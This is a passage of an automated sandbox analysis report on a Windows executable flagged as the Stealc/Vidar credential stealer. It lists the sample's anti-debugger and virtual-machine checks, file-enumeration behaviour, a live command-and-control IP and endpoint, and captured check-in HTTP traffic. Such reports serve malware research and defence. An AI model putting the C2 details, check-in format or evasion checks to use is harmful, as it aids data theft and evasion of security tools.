                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06BF second address: 4CF06E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F96F95D6D6Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06E2 second address: 4CF06F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F934F1ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BCC3A second address: 5BCC40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BCC40 second address: 5BCC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 3FDACA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5B4826 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5B2E14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5C2FED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-38815)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00111710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00123B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0011DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00111160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2197299043.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2197299043.0000000000E63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37628)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37631)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37642)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37682)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37647)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37515)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00114610 VirtualProtect ?,00000004,00000100,00000000,0_2_00114610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00129BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129AA0 mov eax, dword ptr fs:[00000030h],0_2_00129AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00127690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00129790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00129790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_001298E0
Source: file.exe, file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: LF>Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00157588 cpuid 0_2_00157588
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00127D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00127B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001279E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00127BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00127BC0

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.110000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.110000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one tactic per column; a number in front of a technique is the report's match count for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php/r | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/P | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php- | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpe/ | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.phpu. | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php%.& | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpW | file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544128
Start date and time: 2024-10-28 21:40:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 132
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
                                    No context
                                    No context
                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.958933171703137
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'181'632 bytes
MD5: 37ad51a72ae2ee4f18f90db961ca42e0
SHA1: 4e981723fa01e7aa8f81b23c734a13b2cdb9e252
SHA256: 33c2bf98bb8da8afa179fd90efc0b686e9eca69ffa2ab5b8163ece46a90ff561
SHA512: 83a764e4ff347912c558aaa79d99144ab43d4212fc9275fc14053dcd6c3a5544fb83aeef50fa8b9c85a6eb436346e58d1e436bf2a45d5365ed50a9dc9db96d68
SSDEEP: 49152:JbaU4vJCi2C95vOT/gbQcbYa3CSjw0zCGT:wU4vJC25WUUsJPzCG
TLSH: 8BA53393065BB925C75C3772D28B6EEE31E104D604177ABEB527D8B13A43A22F03BD64
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
Icon Hash: 00928e8e8686b000
Entrypoint: 0xb4a000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (entrypoint disassembly): jmp 00007F96F93F4BBAh; movaps xmm4, dqword ptr [ecx]; the remaining listed bytes decode as padding (add byte ptr [eax], al and similar)
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | e879f4b89ed07b7afe5e21af5e477179 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2b5000 | 0x200 | ef759830474f1838668da3d3961e74ea | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
szuavcfa | 0x59f000 | 0x1aa000 | 0x1a9a00 | 79fd7ff8b6a76f2576ec8a9913b6cd00 | False | 0.9949861187591776 | data | 7.954150406224703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lozgslii | 0x749000 | 0x1000 | 0x400 | 70114bf6eb5d300cde0ec57f5e09e71a | False | 0.767578125 | data | 5.972169537006448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x74a000 | 0x3000 | 0x2200 | c6c30224976aa1f98dff4659d4196836 | False | 0.05859375 | DOS executable (COM) | 0.7690936055256556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    DLL           Import
                                    kernel32.dll  lstrcpy
                                    Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                                    2024-10-28T21:41:05.720999+0100  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.6  49710        185.215.113.206  80         TCP
                                    Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                    Oct 28, 2024 21:41:04.452475071 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:04.457945108 CET  80           49710      185.215.113.206  192.168.2.6
                                    Oct 28, 2024 21:41:04.461972952 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:04.462573051 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:04.468054056 CET  80           49710      185.215.113.206  192.168.2.6
                                    Oct 28, 2024 21:41:05.396541119 CET  80           49710      185.215.113.206  192.168.2.6
                                    Oct 28, 2024 21:41:05.396617889 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:05.432517052 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:05.438009977 CET  80           49710      185.215.113.206  192.168.2.6
                                    Oct 28, 2024 21:41:05.720895052 CET  80           49710      185.215.113.206  192.168.2.6
                                    Oct 28, 2024 21:41:05.720999002 CET  49710        80         192.168.2.6      185.215.113.206
                                    Oct 28, 2024 21:41:08.596872091 CET  49710        80         192.168.2.6      185.215.113.206
                                    • 185.215.113.206
                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                    0           192.168.2.6  49710        185.215.113.206  80                6552  C:\Users\user\Desktop\file.exe
                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                    Oct 28, 2024 21:41:04.462573051 CET  |  90  |  OUT
                                    GET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 28, 2024 21:41:05.396541119 CET  |  203  |  IN
                                    HTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 20:41:05 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 28, 2024 21:41:05.432517052 CET  |  413  |  OUT
                                    POST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 35 34 37 34 42 46 32 42 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a
                                    Data Ascii (CRLF line breaks restored from the raw bytes):
                                    ------AECAECFCAAEBFHIEHDGH
                                    Content-Disposition: form-data; name="hwid"
                                    
                                    7E5474BF2BE41866486636
                                    ------AECAECFCAAEBFHIEHDGH
                                    Content-Disposition: form-data; name="build"
                                    
                                    tale
                                    ------AECAECFCAAEBFHIEHDGH--
                                    Oct 28, 2024 21:41:05.720895052 CET  |  210  |  IN
                                    HTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 20:41:05 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=

                                    Target ID:0
                                    Start time:16:40:58
                                    Start date:28/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
